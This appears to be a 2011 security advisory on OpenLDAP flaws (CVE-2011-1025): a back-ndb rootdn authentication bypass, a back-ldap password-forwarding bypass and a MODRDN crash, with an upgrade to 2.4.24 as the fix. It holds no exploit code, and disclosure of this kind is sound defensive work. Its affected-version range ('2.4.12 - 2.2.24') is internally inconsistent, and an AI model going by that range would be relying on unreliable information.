You are here

T-575: OpenLDAP back-ndb Lets Remote Users Authenticate Without a Valid Password

March 11, 2011 - 3:05pm

Addthis

PROBLEM:

A vulnerability was reported in OpenLDAP. A remote user can authenticate without a valid password.

PLATFORM:

Open LDAP version(s) 2.4.12 - 2.2.24

ABSTRACT:
 

OpenLDAP back-ndb Lets Remote Users Authenticate Without a Valid Password.

reference LINKS: 

SecurityTracker Alert ID:1025190
Secunia Advisory:SA43331
OpenLDAP Issue
OpenLDAP Download
CVE-2011-1025

 

IMPACT ASSESSMENT:

Medium

Discussion:

A remote user with knowledge of the target distinguished name can provide an arbitrary password to successfully authenticate on systems using the NDB back-end.

Impact:

Some vulnerabilities have been reported in OpenLDAP, which can be exploited by malicious people to bypass certain security restrictions and cause a DoS (Denial of Service).

1) An error in the "back-ldap" component when a slave server forwards password failures to a master server can be exploited to successfully authenticate with an invalid password.
Successful exploitation of this vulnerability requires a master and slave configuration with the "ppolicy_forward_updates" option.

2) An error in the "back-ndb" component when handling authentication for a "rootdn" Distinguished Name (DN) can be exploited to perform arbitrary actions (e.g. searching or updating) without a valid password.
Successful exploitation of this vulnerability requires knowing the "rootdn" value as configured in the slapd.conf file.

3) An error exists within the handling of certain MODRDN requests, which can be exploited to cause a crash by submitting specially crafted MODRDN requests.

Solution:
 

Patches/Software Downloads: Update to version 2.4.24.

OpenLDAP-2.4.24
 

 

Addthis